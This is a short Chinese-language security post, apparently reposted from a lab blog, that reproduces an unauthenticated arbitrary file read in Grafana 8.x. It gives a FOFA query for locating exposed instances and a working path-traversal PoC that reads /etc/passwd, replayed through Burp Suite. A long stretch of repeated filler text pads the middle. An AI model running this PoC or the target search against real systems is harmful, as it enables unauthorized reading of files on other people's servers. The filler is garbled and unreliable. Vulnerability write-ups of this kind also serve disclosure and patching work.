Grafana 未授权任意文件读取

辰星安全实验室 2021-12-09

1720

前言

Grafana是一款用Go语言开发的开源数据可视化工具，可以做数据监控和数据统计，带有告警功能。目前使用grafana的公司有很多，如paypal、ebay、intel等。

Grafana 未授权任意文件读取 0day 相关漏洞情报，攻击者可以利用该漏洞任意读取主机上的文件

影响版本

Grafana 8.x

fofa查询语句
app="Grafana"

漏洞复现
登录界面

POC

/public/plugins/welcome/../../../../../../../../../etc/passwd

BP抓包吧POC路径复制放包

执行成功，切勿违法行为！！！
国内受影响资产统计数据信息如下：

增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增字数增

数据库

文章转载自辰星安全实验室，如果涉嫌侵权，请发送邮件至：contact@modb.pro进行举报，并提供相关证据，一经查实，墨天轮将立刻删除相关内容。

Grafana 未授权任意文件读取

评论